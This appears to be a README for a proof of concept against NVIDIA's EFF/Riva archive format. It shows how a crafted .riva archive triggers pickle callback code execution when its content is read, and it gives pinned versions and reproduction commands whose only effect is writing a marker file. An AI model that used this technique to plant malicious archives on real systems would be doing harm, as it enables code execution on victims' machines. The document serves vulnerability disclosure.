Riva / NVIDIA EFF Pickle Callback PoC
This directory contains a minimal .riva/EFF archive that demonstrates
manifest-controlled PickleContentCallback execution when a consumer reads an
artifact with the default Artifact.get_content() behavior.
Tested versions:
nvidia-eff==0.6.7
nemo2riva commit 95db8a086d32db1021dfea6b307b119680d9ac7e
Reproduce:

```shell
python3 -m venv .venv-riva
.venv-riva/bin/pip install --extra-index-url https://pypi.nvidia.com nvidia-eff==0.6.7
rm -f /tmp/riva_eff_pickle_callback_executed
.venv-riva/bin/python test_eff_pickle_callback_rce.py
.venv-riva/bin/eff-inspect poc/malicious-pickle-callback.riva content -a artifacts:payload.bin
cat /tmp/riva_eff_pickle_callback_executed
```
Expected marker:
eff_pickle_callback_executed
Artifact:
poc/malicious-pickle-callback.riva
SHA256: 71502a162533d0cb5fca537b8bb8bcb7a5841047ab9d25277a9161b4c5f1f95b